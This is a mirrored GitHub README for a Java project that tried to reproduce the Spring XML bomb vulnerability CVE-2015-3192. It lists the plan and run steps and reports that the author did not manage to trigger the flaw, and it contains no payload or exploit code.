Giters

chuajiesheng / spring-xml-bomb

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Vulnerability of Spring to XML Bomb

Referencing CVE-2015-3192:

  1. Pivotal CVE
  2. SourceClear CVE
  3. Spring Bug Report

Objective of this project:

  1. Determine the vulnerable methods causing this bug
  2. Proof of concept of the vulnerability

Plan:

  1. Have a simple hello world Spring application
  2. Accept XML payload
  3. Send XML bomb
  4. Demonstrate vulnerability

Steps

  1. Run the sample app via mvn jetty:run
  2. Upgrade sample code to use 3.2.0.RELEASE which is one of the vulnerable version

Reference

  1. Spring sample app

Outcome

  1. Did not manage to trigger the vulnerability even if the converter was initialised
  2. Need to better understand Spring initialisation and setup

About

License:Apache License 2.0

Languages

Language:Java 100.0%